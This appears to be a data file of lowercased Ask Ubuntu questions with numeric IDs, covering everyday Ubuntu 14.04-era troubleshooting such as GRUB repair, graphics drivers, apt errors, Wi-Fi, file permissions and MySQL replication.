469354	how do i get multiple available resolutions in ubuntu via hyperv ?	this thread is nearly identical but was no help . running ubuntu 12 in hyperv ( the only virtualization i have available ) on another machine . i 'm connecting to the machine with 5nine manager . connecting with hyperv ( via remote desktop into the server ) does n't change anything . the accepted answer is to edit /etc/default/grub and update , then reboot . i 've done that and i still only have one available resolution : 1152x864 . grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash video=hyperv_fb:1920x1080 '' grub_cmdline_linux= '' '' and my /etc/initramfs-tools/modules : ... # raid1 # sd_mod hv_vmbus hv_storvsc hv_blkvsc hv_netvsc i can see that they are running via lsmod : hv_utils 18348 0 hv_netvsc 31677 0 hv_storvsc 22357 2 floppy 70206 0 hv_vmbus 48420 6 hid_hyperv , hv_balloon , hyperv_fb , hv_utils , hv_netvsc , hv_storvsc but still , only one resolution in my displays setting . how can i fix this ?
469359	very low temperature reading for graphics driver using lm-sensors	i recently installed ubuntu 14.04 and got the package lm-sensors . i mainly did this to monitor if my laptop was overheating . each time i run it , it shows a very low temperature reading ( the same every time ) of -128.0 degrees celcius . why does this happen ?
469360	what is the difference between libcurl3 and libcurl4	i was setting up an ubuntu 14.04 development environment and went to install libcurl but noticed that there are two different version in my aptitude caches . what are the main differences between the versions and which do people recommend for django projects ? i 'm assuming libcurl4 is newer , and possibly better , but i 'm worried that it may break compatibility with other products , act strange with snake oil certs or cause me headaches in the future . are there any big gotchas that i should be aware of with libcurl4 ? thanks .
469361	cant fix grub 2 and gparted shows unallocated disk	i have been dualbooting ubuntu 14.04 and windows xp , but some days ago , i saw on the grub 2 screen the partition windows rescue enviroment and i clicked it . after that , i saw the following : no such partition entering grub rescue > after that , anything i clicked on ( ubuntu or win xp ) would only display the same screen . i turned it off , and turned it on again but it wouldnt even display the grub menu , just the grub rescue . i thought i could fix it with my live usb ( ubuntu 13.10 ) , by downloading boot-repair , but the wifi administrator does not work , it only displays this : vpn connections > ( check mark ) enable networking edit connections and , i entered to gparted trought my live usb and it only displays unallocated 149.05 gib partition - file system - size unallocated ( ! ) - unallocated - 149.05 gib can you help me to fix my laptop , im desperated ! im on exam week and all of my homework , exam guides , and 17 gigs of photos from a trip to florida and i cant lose anithing from there im on another laptop sorry for my bad eanglish , it is not my main language
469365	retrieving data from accidentally formatted hard drive ( after trying with testdisk )	i have accidentally formatted my external hard drive ( 500gb , toshiba ) . i tried to retrieve data by using testdisk but without success . does anyone have any other idea ? thanks
469366	how do i enable microphone `` sidetone '' in ubuntu ?	one of the main reasons i prefer gaming on windows rather than linux is that the logitech driver ( for windows ) allows me to enable microphone `` sidetone '' . when sidetone is tuned up , i can hear myself when talking in the microphone , which makes using the headset for long periods of time much less uncomfortable . to specify ; what i 'm looking for is a setting or application that makes the sound input feed directly to the sound output with no delay , at an adjustable volume . would this be possible to achieve in linux ? i 'm using pulseaudio 4.0 and a logitech g930 wireless headset . full disclosure - i 'm actually using debian with cinnamon , but i also had this issue in ubuntu and i 'm betting that most solutions will work on both systems . what have i tried ? i 've tried using pacat to record and pipe the microphone input to the default output device : pacat -r -d alsa_input.usb-logitech_logitech_g930_headset-00-headset.analog-mono | pacat -p -- volume=20000 -- latency-mc=1 -- process-time-msec=1 but with all the latency-related options set to their minimum , i still get a ~0.25 sec delay from input to output .
469367	how to install kubuntu notes ( 1.7.7 ) in ubuntu 14.04	i 'm a newb when it comes to ubuntu , so here i am . i 've tried 2 flavors of ubuntu this week and there 's one thing i love in kubuntu that i really wanted to have in my unity-based ubuntu , the kubuntu notes plug-in . i 've tried evey note app i tried but none works as kubuntu 's one . is there a way of having that one in ubuntu ? thanks in advance .
469368	need help connecting wd my cloud nas to 14.04	i recently purchased the 2tb wd my cloud nas , and now i realize that it does n't have ubuntu support and can not figure out how to make it connect . i found this , http : //cocoaallocinit.com/2014/01/04/wd-my-cloud-nas-on-ubuntu/ but it does n't make sense . showmount -e ip address of device > it is talking about the my cloud right ? where do i find the ip address for that ? please help .
469372	set up bandwidth limiting proxy ?	i want to set up a proxy on an ubuntu box for my brother to torrent through and then be able to limit the bandwidth with the proxy . i have tried looking for how to do this , but to no avail .
469373	apt-get update using binary-x64 instead of binary-amd64 and failing	i am getting these error messages when updating my package lists . maybe you can help me out : sudo apt-get update hit http : //repo.steampowered.com precise inrelease ign http : //us.archive.ubuntu.com trusty inrelease hit http : //repo.steampowered.com precise/steam sources ign http : //us.archive.ubuntu.com trusty-security inrelease hit http : //repo.steampowered.com precise/steam amd64 packages hit http : //repo.steampowered.com precise/steam i386 packages ign http : //us.archive.ubuntu.com trusty-updates inrelease hit http : //us.archive.ubuntu.com trusty release.gpg get:1 http : //us.archive.ubuntu.com trusty-security release.gpg [ 933 b ] get:2 http : //us.archive.ubuntu.com trusty-updates release.gpg [ 933 b ] hit http : //us.archive.ubuntu.com trusty release get:3 http : //us.archive.ubuntu.com trusty-security release [ 58.5 kb ] get:4 http : //us.archive.ubuntu.com trusty-updates release [ 58.5 kb ] hit http : //us.archive.ubuntu.com trusty/main sources hit http : //us.archive.ubuntu.com trusty/restricted sources hit http : //us.archive.ubuntu.com trusty/universe sources hit http : //us.archive.ubuntu.com trusty/multiverse sources hit http : //us.archive.ubuntu.com trusty/main amd64 packages hit http : //us.archive.ubuntu.com trusty/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty/universe amd64 packages hit http : //us.archive.ubuntu.com trusty/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty/main i386 packages hit http : //us.archive.ubuntu.com trusty/restricted i386 packages hit http : //us.archive.ubuntu.com trusty/universe i386 packages hit http : //us.archive.ubuntu.com trusty/multiverse i386 packages get:5 http : //us.archive.ubuntu.com trusty-security/main sources [ 14.7 kb ] get:6 http : //us.archive.ubuntu.com trusty-security/restricted sources [ 14 b ] get:7 http : //us.archive.ubuntu.com trusty-security/universe sources [ 4,212 b ] ign http : //repo.steampowered.com precise/steam translation-en_us get:8 http : //us.archive.ubuntu.com trusty-security/multiverse sources [ 687 b ] ign http : //repo.steampowered.com precise/steam translation-en get:9 http : //us.archive.ubuntu.com trusty-security/main amd64 packages [ 47.0 kb ] get:10 http : //us.archive.ubuntu.com trusty-security/restricted amd64 packages [ 14 b ] get:11 http : //us.archive.ubuntu.com trusty-security/universe amd64 packages [ 17.7 kb ] get:12 http : //us.archive.ubuntu.com trusty-security/multiverse amd64 packages [ 1,154 b ] get:13 http : //us.archive.ubuntu.com trusty-security/main i386 packages [ 45.1 kb ] get:14 http : //us.archive.ubuntu.com trusty-security/restricted i386 packages [ 14 b ] get:15 http : //us.archive.ubuntu.com trusty-security/universe i386 packages [ 17.7 kb ] get:16 http : //us.archive.ubuntu.com trusty-security/multiverse i386 packages [ 1,404 b ] get:17 http : //us.archive.ubuntu.com trusty-updates/main sources [ 35.9 kb ] get:18 http : //us.archive.ubuntu.com trusty-updates/restricted sources [ 14 b ] get:19 http : //us.archive.ubuntu.com trusty-updates/universe sources [ 23.8 kb ] get:20 http : //us.archive.ubuntu.com trusty-updates/multiverse sources [ 2,234 b ] get:21 http : //us.archive.ubuntu.com trusty-updates/main amd64 packages [ 83.4 kb ] get:22 http : //us.archive.ubuntu.com trusty-updates/restricted amd64 packages [ 14 b ] get:23 http : //us.archive.ubuntu.com trusty-updates/universe amd64 packages [ 64.3 kb ] get:24 http : //us.archive.ubuntu.com trusty-updates/multiverse amd64 packages [ 7,089 b ] get:25 http : //us.archive.ubuntu.com trusty-updates/main i386 packages [ 81.6 kb ] get:26 http : //us.archive.ubuntu.com trusty-updates/restricted i386 packages [ 14 b ] get:27 http : //us.archive.ubuntu.com trusty-updates/universe i386 packages [ 64.5 kb ] get:28 http : //us.archive.ubuntu.com trusty-updates/multiverse i386 packages [ 7,273 b ] fetched 639 kb in 3s ( 192 kb/s ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty/release unable to find expected entry 'main/binary-x64/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty-security/release unable to find expected entry 'main/binary-x64/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/release unable to find expected entry 'main/binary-x64/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . i get them using my old sources.list and one i built at a repo building site mentioned from other similar questions . see my current sources.list below . # # # # # # ubuntu update repos deb http : //us.archive.ubuntu.com/ubuntu/ trusty-security main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ trusty-updates main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty-security main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty-updates main restricted universe multiverse when viewing the failed urls , i notice that these list main/binary-amd64 instead of binary-x64 . it appears that i could fix this by putting deb=amd64 in each sources line , but i doubt that this is the root of the issue . uname -a returns : linux knights 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux in case it matters i did upgrade this from 13.10 . output from dpkg -- print-foreign-architectures : i386 x64
469377	ca n't install ubuntu 14.04 shows black screen . gtx 750 ti	i 'm having trouble installing ubuntu 14.04 from flash drive . i can see the options for trying , installing and checking disk for defects but if choose any of them it 's just a black screen . i can hear a jingle when i try `` try ubuntu without installing '' and `` install ubuntu '' options but it 's still a black screen . i have intel i5 4570 , gtx 750 ti with 4gb of ram . i do have ubuntu 14.04 installed right now but i want to totally reinstall it .
469379	usb keyboard does n't work in initrd shell	i 'm working on a custom initrd that i 'm netbooting and need to break into a shell . unfortunately the usb keyboard does n't work once it breaks into the shell . it does however work when i netboot it under virtualbox . but i need the shell on the real hardware not vm . what kernel module is required for usb keyboards to work ? by the way , the console output shows the keyboard is detected . but when i type nothing appears on the screen . i 've tried a couple of different keyboards but without success . both were detected but were not usable .
469381	can not boot as directed from thumbdrive	i 've downloaded the basic ubuntu , opened it with fileopen ( as recommended ) and tried to run it rebooting my pc . it will not automatically run from the thumbdrive ( opens windows ) and it will not run when i deliberately choose the thumbdrive ( opens nothing whatever ) . i 've deleted the thumbdrive contents and reloaded it a couple of times , with and without choosing everything showing on fileopen ( i get the same files opened either way ) . i really want to try ubuntu , but simply can not get it to run . any suggestions to accomplish this would be appreciated . i 'm not pc savvy , but willing to try .
469382	how to refresh privileges on a script ?	i have an script that modify files and group permissions . but it does n't bring effects 'till i close the session and open a new one . instructions where permissions are changed : sudo groupadd -- system webapps sudo useradd -- system -- gid webapps -- home /home/lucio/server/webapps/hello_django hello sudo chown -r hello : webapps . sudo chmod -r g+w . sudo usermod -a -g webapps `whoami` instruction where i get the error : cd /home/lucio/server/webapps/ cp assets/gunicorn_start.bash.template hello_django/bin/gunicorn_start.bash the last line gives me the following error : cp : can not create regular file 'hello_django/bin/gunicorn_start.bash ' : permission denied this should help : i have tried using login username after changes privileges but that does absolutely nothing . how can i update the privileges without exit from the script ?
469384	microsoft natural keyboard 4000 becomes unresponsive every few minutes	i just installed ubuntu 14.04 on my desktop . every few minutes my microsoft natural keyboard 4000 becomes un responsive . the leds turn off . i need to unplug and replug in the keyboard . this is a usb keyboard with a power cable . does anybody have a suggestion ?
469385	wireless card problems	i 'm new to linux so forgive me if this is redundant or unclear . i just finished installing ubuntu ( 14.04 ) ; however , when i try to connect to a wireless network via settings or the top menum i am not seeing a wireless connection option at all . before installing ubuntu originally , i used the `` try ubuntu without installing '' option . i quickly noticed the same problem . through a little research i was able to find that i could use the `` additional drivers '' option to install the standard broadcom driver which would give me back the wireless functionality that i was lacking . after partitioning my hard drive and installing ubuntu , i ran into the same problem as far as no wireless option showing up . i attempted to solve the problem with the previously mentioned method but when i click `` apply changes '' in the `` additional drivers '' tool , it appears as if the driver begins to install and then just stops without completing its install . i 've tried this numerous times after restarting and reinstalling but ultimately i always come to the same ends . i tried looking both here and elsewhere on the internet for a possible workaround or solution to my problem and all i am able to find is half-written terminal commands that are nearly illegible to a new-user such as myself . if anyone has a possible work-around or solution simple enough for a beginner to accomplish , it would be greatly appreciated .
469386	pari gp most current version ?	i see at http : //pari.math.u-bordeaux.fr/download.html the most current version of pari/gp is pari-2.7.1.tar.gz , but i am looking for the ubuntu distro with it or would like to know when the current one would have it ? i currently am running pari 2.5.5 from the current ubuntu 14.4 lts .
469389	delete xp from dual boot ?	i am running ubuntu 14.04 and windows xp in dual boot mode . i am ready to kick xp to the curb and only run ubuntu . how do i do this and not lose my settings in ubuntu ?
469393	nvidia drivers not found	after installing cuda when i am trying to run devicequery demo i am getting following error . cuda device query ( runtime api ) version ( cudart static linking ) cudagetdevicecount returned 35 cuda driver version is insufficient for cuda runtime version result = fail after trying to verify the driver version using the following command cat /proc/driver/nvidia/version cat : /proc/driver/nvidia/version : no such file or directory exists . suggestions to resolve the problem are welcomed .
469394	problem after install kubuntu-desktop on xubuntu 14.04	i 've installed kubuntu-desktop on my xubuntu via apt-get install kubuntu-desktop , i reboot my xubuntu but when the login screen shows up , i 've got no sessions manager to change to kde ? why is this happen ? please help me..
469396	is searching on ntfs drives supported ?	it does n't matter what file manger i use dolphin , nautilus , or pcmanfm . it does n't matter what machine i 'm on . i 've never been able to search ntfs drives on ubuntu or it 's derivatives . i can browse them , but searches never yield results . however searching on ext4 and ext3 work fine . is searching ntfs drives supported in pcmanfm , nautilus , or dolphin ? and if not what filesystems are ?
469398	add categories to gnome shell ( within activities view )	there are some distributions that bring this feature by default . is it an extension ? a shell specific version ? take a look at this screenshot :
469399	how do i run a application on top/in a display manager like gdm ?	i was wondering if there is a way to run a application like onboard on a display manager like gdm . if it depends on the display manager than please post the gdm instructions , or all of the popular display managers . the reason why i need onboard running while using gdm is i am learning the dvorak keyboard layout ... please note i know there is an on-screen keyboard included in gdm . please do n't post that as an answer , i am using the keyboard as an example and would like to know how to run any application in the gdm window .
469402	recover hard drive space	i was trying to set up a dual boot windows xp/ubuntu system . the laptop had a very small hd ( only 55gb with 30gb available ) . i allocated 20gb for ubuntu . while installing , ubuntu froze and i shut the machine down . through various attempts to fix it , i lost the kernel and now those 20gb are sitting useless . i 've tried various methods , reading different searches to recover the partition and start over . windows xp sees it as defragmented space and can not do anything with them . it 's not a separate partition , which i found strange from my previous encounters on a desktop . both xp and ubuntu are on the same c : drive partition , i think . also , i foolishly deleted anything that said `` ubuntu '' in windows xp , so it may be that there 's no file for xp or linux to read . i did try to install another linux os , but i received an error message that ubuntu is already installed , so to some extent it can see it . i just ca n't find it . any ideas what i can do ? i 'd be happy just to get back to 30gb in windows xp , but i 'd be glad to make use of whatever ubuntu i 've already installed . can i recover the kernel at the grub prompt ? i 've tried to reinstall and it wants to install on the remaining 10gbs . here is what i found in the terminal . i was using a live cd to install when i ran into trouble . ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 58.5 gb , 58506416640 bytes 255 heads , 63 sectors/track , 7113 cylinders , total 114270345 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe686f016 device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility /dev/sda2 * 80325 104518889 52219282+ 7 hpfs/ntfs/exfat /dev/sda3 104518890 114254279 4867695 db cp/m / ctos / ... ubuntu @ ubuntu : ~ $
469404	made an ubuntu live usb on a compromised system . how to make sure the usb is n't compromised and how to securely reinstall ubuntu	i finally made an ubuntu live usb on a compromised ubuntu desktop laptop . startup disk creator told me the usb was 7.2 gb , instead 7.8 gb and i believe the original hack involved my flash drive . is there any way to make sure the usb is n't infected and is there any way of completely cleanly and securely reinstalling ubuntu to lock out the hacker ? also my ubuntu 14.04 iso said it was made thursday but modified the monday before . is it safe to trust it ?
469406	can not restore/update password for laptop how can i restore the old password	i was adding another account on to my ubuntu and some how the main admin password does not work and when i go to update with a new password it will not let me update the password , and i have researched how to do it from grub but for some reason it will not let me , is there another way to do it i have tried to remove the new account and it will not let me and this is the main admin password for my computer any help will do
469410	download speed is unusually slow ?	on a internet speed test i get on average 20 download and 2 upload , however when i 'm trying to actually download something , be it updates , or just recently a kali linux .iso file it only downloads at a < 1mbps speed . when i boot into windows 8 instead my download speeds are normal , things download at the average 20mbps download speed like it says it should . can anyone help ? i 'm testing all of this on a direct ethernet connection , so i don’t see why i’d get poor connection .
469411	why is using the # symbol as a preface not a comment ?	< - - linux noob . i am normally on raspberry , but the # symbol caused me to move my question here . attempting to run a script , and failing , i found answers in raspberry to use the following ( preceded by the symbol # ) : # ! /usr/bin/env python link here describes my confusion . i thought # indicated a comment ( in linux and in raspberry python ) . i do n't understand the # symbol at the beginning of the command prompt . # ! /usr/bin/env python . question : is the # symbol to be typed in ? i suspect the # symbol shows only because that otherwise the command would be executed .
469412	can i restore mysqldump to a master-master replicated server ?	suppose i have two servers a and b replicating each other ( master-master ) . i think all the permissions such as 'grant replication slave ' , 'change master to master_host ' are storing in the database mysql , correct ? . suppose i take the mysqldump of the first server as below : mysqldump -u root -ppassword -- all-databases > /location_of_backup_server1/backup.sql and restoring it in the second server as below : mysql -u root -ppassowrd < location_of_backup_server2/backup.sql will it break the replication ? ( all the grant privileges in the server2 ( mysql database ) is replaced by the grant privileges in server1 ? ? ) what if i take the full backup of a server that is not part of these master-master replication and restoring to one of the servers in master-master sync ? i want to confirm these before trying in the actual servers .
469415	dns issues . why and how to resolve ?	i had been running internet via my usb modem and things were pretty well till last week . from then , i was n't able to access websites or any net service , though applet shows network is connected . earlier i thought its usual network 's issue . but , when things escalate , i jump on to web through my mobile that is it just me ? as expected , it was with other people too and there are solutions too , one of which work for me . but my question is , why is this happening ? i was n't able to correct it by reconfiguring resolvconf . why ? presently , i have solved the issue by adding additional dns in ipv4 settings ( 8.8.8.8,8.8.8.4 ) . now , since i am kind of security and privacy concious , i want to know that whether it means that all my traffic is routing through this dns ? if yes , then is n't t a privac and security issue . how can i make things as good as before , i.e . accessing internet without using any additional dns ? for others looking for a solution , here is which worked for me no internet access after upgrading from ubuntu 12.04 to ubuntu 14.04 regards
469416	booting says `` read error '' randomly	every time i try to boot after installing ubuntu i get `` read error '' and nothing else . i was able to get into grub boot manager a couple of times randomly , but i have n't been able to in a while . i 'm not sure why it would occasionally work . specs : motherboard : gigabyte z68apd3 cpu : i3 3240 hdd : 250 gb sata wd hdd graphics : nvidia 550 ti 8 gb ram
469417	system time changes in ubuntu 14.04 at every reboot .	i want to know why does the system time change after every reboot in ubuntu 14.04 ? ? i have a dual os machine ( other one being win7 ) . if i boot in windows 7 first and then reboot the machine in ubuntu 14.04 , the time shown in the latter is incorrect . please suggest a solution .
469420	black screen after selecting install ubuntu from boot menu ( running windows 8 pre-installed )	i have a windows 8 pre-installed laptop here . i used unetbootin to create a usb bootable drive for ubuntu 14.04 x64 . i resized my disk partition , and disabled secure boot . here 's my situation : in legacy mode : all bootable devices result in this : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al . i have to reboot and put the system back in uefi mode to do anything . in uefi mode : i select the usb drive from the system boot screen ( press f10 ) , and get to the black menu ( install ubuntu , test without installing , check drives ) . i select install , and i’m thrown back into system boot screen ( press f2 for setup , and f10 for boot device.. etc ) . i never get to the ubuntu install screen . it loops between the usb ubuntu install menu , and the system boot screen . i can only load into windows 8 . system info : ⠀acer aspire v5-552g_080f_2_07 ⠀cpu : amd a8-5557m apu @ 2.1ghz 4 core ⠀chipset : amd - k15 imc ⠀south bridge : amd - a76m fch rev 2.6 ⠀ram : 8gb ⠀os : windows 8.1 x64 build 6.3.9600 ⠀hard drive : gpt format ( 500gb ) ⠀graphics : amd radeon hd 8550g 2gb ddr3
469422	ubuntu 14.04 not booting after error message . /temp could not be mounted ( still need help )	i am trying to change a grub2 boot entry and can not seem to edit or save the file after entering sudo vi /etc/grub.d/10_lupin into terminal . i am having the same problem as a few others with the way ubuntu 14.04 boots and found instructions to fix the problem by changing this line : linux $ { rel_dirname } / $ { basename } root= $ { linux_host_device } loop= $ { loop_file_relative } ro $ { args } to this : linux $ { rel_dirname } / $ { basename } root= $ { linux_host_device } loop= $ { loop_file_relative } rw $ { args } please be patient with me , i do n't know what the heck i 'm doing .
469425	hdmi output problem , some of the top and left space of screen has been eat off	my environment list below machine : gigabyte brix pro gb-bxi7-4770r os : ubuntu 14.04 x86_64 ( upgrade from a brand new ubuntu 12.04 ) display : a chinese made tv screen with the supporting of hdmi , vga , etc my problem is : i use that tv as my display , and it works when i use my android tablet computer which use its hdmi port as the output of movie play but when i use my little brix box , it just eat off some of the top and left space of that screen , which made me cant see those bar on the top side here is the screenshot :
469427	choppy video playback with intel gma-500 chipset	i 've recently installed xubuntu-14.04 on my vaio-p netbook with intel gma-500 graphics chipset . i had several problems ( as expected because of gma-500/poulsbo ) and fortunately i was able to resolve most of them . the last remaining problem to achieve an ideal experience is video playback quality : videos play choppy and laggy . i 've tried several video players , including the default parole , gnome videos ( totem ) and vlc . the first two are the same and have choppy-laggy playbacks . vlc can do nothing and just hangs ! i 'm testing with medium quality ( 480p ) mp4 videos , which should be able to play fine . in windows-7 , even hd ( 720p ) videos can be somewhat played ( though not very smooth ) but there is no problem with 360p or even 480p videos . note : i 've been installing and using ubuntu/xubuntu on this machine since 10.10 and this is not a new problem with 14.04 . in the past the problem was simply because there was no fine performing driver for gma-500/poulsbo graphics . but from 13.04 on-wards , many problems are gone or can be resolved easily , as i have done so myself . so i was wondering if there is a solution for this ? note-2 : i do n't know if this is related information but i also had choppy audio playback ( both for videos and audio files ) , and i was able to resolve it using the solution suggested here , which was adding tsched=0 to the following line in /etc/pulse/default.pa : load-module module-udev-detect this solved the audio playback problem both for audio and video files . now , the only remaining problem is the choppy video playback . update : surprisingly , totem is now playing videos fine ! i do n't know what caused it to work because i did n't work on the issue since yesterday and suddenly it 's working today ! although parole is still unable to play smoothly and it 's exactly as before : choppy and laggy . i 'll be using totem ( gnome videos ) for now , but still i appreciate if anyone can help me understand what solved the problem on totem , and how to solve it on parole to .
469428	file added and deleted events on windows share	i have a ubuntu 14.04 machine that access a windows share hosted on a windows 8.1 machine . the share is mounted like so in my fstab : //windows-pc/work /www cifs uid=www-data , credentials=/home/user/.smbcredentials , file_mode=0777 , dir_mode=0777 , noserverino 0 0 the problem is that when i add or delete a file on the share on the windows pc , ubuntu does not see the change . this is evident when i have nautilus open on that share and attempt to delete or add files to the share using the windows pc . nautilus does not see the change until i manually refresh . strangely enough , if a file was change on the windows pc , ubuntu does see the change immediately . this poses a problem because some of the tools i am using watches the share . they can see the file changes , but can not see adds and deletes . what changes can i make to have ubuntu see files being added and deleted as well ?
469429	upgrade error : trying to overwrite libjpeg.so.8	this why yes friends , i do not understand this problem root @ k3ceb0ng : / # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : console-setup initramfs-tools initramfs-tools-bin initscripts keyboard-configuration kubuntu-desktop libfreerdp-plugins-standard libgnomevfs2-0 libgnomevfs2-common libio-pty-perl liblist-moreutils-perl liblocale-gettext-perl libnih-dbus1 libnih1 libperlio-gzip-perl libsub-identify-perl libsub-name-perl libtext-charwidth-perl linux-generic linux-headers-generic linux-image-generic python-openssl ttf-punjabi-fonts xdg-utils xorg xserver-xorg-video-all the following packages will be upgraded : libjpeg8 1 upgraded , 0 newly installed , 0 to remove and 26 not upgraded . need to get 132 kb of archives . after this operation , 258 kb of additional disk space will be used . do you want to continue ? [ y/n ] y get:1 http : //kali.indonesianhacker.or.id/kali/ kali/main libjpeg8 i386 8d-1 [ 132 kb ] fetched 132 kb in 4s ( 33,0 kb/s ) ( reading database ... 108283 files and directories currently installed . ) preparing to unpack ... /libjpeg8_8d-1_i386.deb ... unpacking libjpeg8 : i386 ( 8d-1 ) over ( 8c-2ubuntu8 ) ... dpkg : error processing archive /var/cache/apt/archives/libjpeg8_8d-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/i386-linux-gnu/libjpeg.so.8 ' , which is also in package libjpeg-turbo8 : i386 1.3.0-0ubuntu2 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
469431	computer will not boot . black screen with cursor only	i tried to install ubuntu to my toshiba satellite from a created disc . after setting partitions , install took extreme amount of time and then shut down . i now can not boot any operating system . a black screen with a cursor in the left upper corner is the only thing that comes up . i can reach the bios screen only by hitting f2 at start up . i have tried a restore with original restore discs but nothing is recognized . i have tried to boot ubuntu from disc but nothing is recognized . so nothing boots from cd drive . what else can i do ? is there a way to wipe clean the computer and simply install ubuntu on fresh ? no other f key works on start up except for f2 into bios screen .
469438	pulling down on the title bar does not resize window ?	previous versions of ubuntu had a neat feature where i could drag down the title bar ( on the global menu ) of any window to resize it ( to get a smaller window ) , but i see that this feature is lacking in ubuntu 14.04 . how can i fix this/get this back ?
469443	dependency problem while processing cups	i tried to update ubuntu but got a prob tried $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : icedtea-7-jre-cacao screen-resolution-extra use 'apt-get autoremove ' to remove them . the following extra packages will be installed : cups suggested packages : cups-pdf the following packages will be upgraded : cups 1 upgraded , 0 newly installed , 0 to remove and 514 not upgraded . 1 not fully installed or removed . need to get 0 b/1,278 kb of archives . after this operation , 4,305 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of cups : cups-filters ( 1.0.18-0ubuntu0.1 ) breaks cups ( < < 1.5.0-16 ) and is installed . version of cups to be configured is 1.5.0-8ubuntu6 . dpkg : error processing cups ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : cups e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what do i do ? ?
469446	how to add folder navigation shortcut ?	i am running ubuntu 14.04 . i want to add folder navigation shortcut on classical-menu-indicator/unity-panel or where possible such as following . i do n't want to set folder shortcut but to set one folder and all navigating tree of sub-folders and files from that folder should be shown as above . is any way to add like this shortcut ? i do n't want to use extra dock like avant-window-navigator .
469447	javafx 3d does not run on ubuntu 14.04	when trying to run the *javafx 3d demo on my ubuntu 14.04 ( gallium 0.4 on amd redwood , java jdk 8u5 ) , i get the fellowing error message : executing /home/lehuythangit/netbeansprojects/javafxapplication2/dist/run869814863/javafxapplication2.jar using platform /usr/lib/jvm/jdk1.8.0_05/bin/java may 20 , 2014 11:35:59 am javafx.scene.perspectivecamera < init > warning : system ca n't support conditionalfeature.scene3d may 20 , 2014 11:35:59 am javafx.scene.scene $ 7 invalidated warning : system ca n't support conditionalfeature.scene3d
469448	how can i get yammer notification alert in ubuntu system	i am using yammer in my system with ubuntu 12.04 version . i want notification alert if any message/comment received . like we have in skype . can any one know it .
469451	losing my saved settings each time i boot up from my usb	i 'm a very new user to ubuntu and everytime a boot with my usb stick i have to reinstall all the apps that i had previously downloaded . why is this so ? ? how do i save everything so that i can just have it there ready for me to use ? ? instead of downloading it each time ? ? i know that this seems like a silly question but i really could use some help .
469453	nvidia driver help	i recently installed a nvidia driver for my gtx 570 in recovery mode since it would not allow xorg to run simultaneously . ( nvidia-linux-x86_64-331.67.run.part ) after i installed i wanted to make sure my driver was working so i installed nvidia-settings . i receive an error stated by nvidia-settings : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . lspci shows : 01:00.0 vga compatible controller : nvidia corporation gf110 [ geforce gtx 570 hd ] ( rev a1 ) i am new to linux and donât feel as if i would be having this problem if not for my novice any help would be greatly appreciated !
469454	what requirements should my app meet in order to be accepted into ubuntu app store ?	this question attempts to identify the constraints an ubuntu ( touch ) app should consider , in order to be accepted by the app store . should it be stable not beta ? should it not allow users to download copyrighted material ? ( from youtube like services ) is advertising allowed ? is it compulsory to follow ubuntu app design guidelines ? is compulsory to develop an app which is capable of converging across devices ? is it compulsory to provide compiled binaries for all cpu architectures ? is there any kind of content the app should not deliver ?
469455	how to run ubuntu 14.04 on vmware in windows 8 ?	i downloaded the .iso file from the ubuntu website but vmware says that the kernel is corrupt . how can i fix this problem/what am i doing wrong ?
469458	python error indentationerror : expected an indented block	i started to learn python , but when i try to make an function i get this error indentationerror : expected an indented block i use the terminal and write python then start to write the function like that > > > def mul ( x , y ) : ... ans=0 file `` < stdin > '' , line 2 ans=0 ^ indentationerror : expected an indented block so what is the wrong thing i 'm doing
469460	logging onto work vpn using linux	i am new to linux . i was using windows for years now , and my work from home was done by using vnc viewer . i use vnc to log into an linux system . now i am using a linux system , is there any way i can skip vnc viewer ? i can ping to my work ip . i can use screen or other such things , but i thought if there was a way i can mount my work linux system and work on my desktop itselfs
469463	ubuntu not booting , getting stuck	last night my system was working properly . when i restarted my system i selected ubuntu . with 5 white dots , 1st dot become orange and then sudden off all 4 dots becomes orange together , which dont use to happen earlier . now ubuntu is stuck with all 5 orange dots and nothing is happening.also keyboard keys are not responding . this is how my laptop is stuck now http : //imageshack.com/a/img834/2205/7e52.jpg
469464	abbreviations in the ubuntu software center	the ubuntu software center uses lots of abbreviations and words that i do not know , because i am not a programmer . ninety-nine out of a hundred times when i look at information about a program with an interesting name i do not understand a word of what is written there . is there a dictionary or a thesaurus somewhere where i can find these things ?
469465	can not connect to tata photon plus network	i have installed tata photon plus using network and connections but it is not connecting to internet as a message appears no modem connection . how to solve it .
